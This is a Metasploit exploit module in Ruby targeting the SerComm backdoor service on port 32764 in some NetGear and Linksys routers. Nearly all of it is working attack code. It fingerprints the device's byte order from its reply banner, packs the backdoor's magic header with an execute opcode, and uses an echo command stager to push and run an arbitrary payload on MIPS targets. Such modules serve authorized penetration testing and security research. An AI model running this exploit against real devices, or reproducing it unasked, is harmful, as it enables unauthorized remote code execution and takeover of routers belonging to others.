##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
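class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStagerEcho

  # Magic value the backdoor service expects at the start of every request.
  # Packed with "V" (little-endian) it is the byte string "MMcS".
  BACKDOOR_MAGIC = 0x53634d4d
  # Message type that makes the service execute the text following the header.
  CMD_EXEC = 0x07
  # Port the backdoor service listens on by default.
  DEFAULT_PORT = 32764

  def initialize(info = {})
    super(update_info(info,
      'Name'        => "SerComm Device Remote Code Execution",
      'Description' => %q{
        This module will cause remote code execution on several SerComm devices.
        These devices typically include routers from NetGear and Linksys.
        Tested against NetGear DG834.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
        ],
      'Payload'     =>
        {
          'Space'       => 10000, # Could be more, but this should be good enough
          'DisableNops' => true
        },
      'Platform'    => 'linux',
      'Privileged'  => false,
      'Targets'     =>
        [
          [ 'Linux MIPS Big Endian',    { 'Arch' => ARCH_MIPSBE } ],
          [ 'Linux MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ],
        ],
      'DefaultTarget'  => 0,
      'References'     =>
        [
          [ 'OSVDB', '101653' ],
        ],
      'DisclosureDate' => "Dec 31 2013"
    ))

    register_options(
      [
        Opt::RPORT(DEFAULT_PORT)
      ], self.class)
  end

  # Probes RPORT and reports the host as vulnerable when the service answers
  # with either known byte-order banner; anything else (including no reply or
  # a failed connection) is reported as Unknown.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    detected = {
      'BE' => "Detected Big Endian",
      'LE' => "Detected Little Endian"
    }

    message = detected[endian_fingerprint]
    return Msf::Exploit::CheckCode::Unknown unless message

    print_status(message)
    Msf::Exploit::CheckCode::Vulnerable
  end

  # Hands the payload to the echo-based command stager, which delivers it
  # through execute_command below. :noargs => true asks the stager to run the
  # dropped file without arguments.
  def exploit
    execute_cmdstager(:noargs => true)
  end

  # Sends a short random probe to the service and classifies the device by the
  # prefix of its reply.
  #
  # The socket is always disconnected once it has been opened, even if the
  # send or receive raises; a failed connection is reported and yields nil.
  #
  # @return [String, nil] 'BE', 'LE', or nil when no known banner was seen
  def endian_fingerprint
    reply = nil

    begin
      connect
      begin
        sock.put(rand_text(5))
        reply = sock.get_once
      ensure
        disconnect
      end
    rescue ::Rex::ConnectionError => e
      print_error("Connection failed: #{e.class}: #{e}")
      return nil
    end

    return nil unless reply
    return 'BE' if reply.start_with?("MMcS")
    return 'LE' if reply.start_with?("ScMM")

    nil
  end

  # Callback used by the command stager for each command it wants run.
  #
  # Wire format is three little-endian 32-bit words — magic, exec opcode and
  # the byte length of the command — immediately followed by the command text.
  # bytesize is used (rather than length) so the length field stays correct
  # for any command that is not pure ASCII.
  #
  # @param cmd  [String] command text to send
  # @param opts [Hash]   stager options; not used by this transport
  def execute_command(cmd, opts)
    vprint_debug(cmd)

    header = [BACKDOOR_MAGIC, CMD_EXEC, cmd.bytesize].pack("VVV")

    connect
    begin
      # Send command structure followed by command text
      sock.put(header + cmd)
    ensure
      # Each command uses a fresh connection; never leave the socket open
      # if the write raises.
      disconnect
    end

    # Pace the stager: the original module waits one second between commands.
    Rex.sleep(1)
  end
end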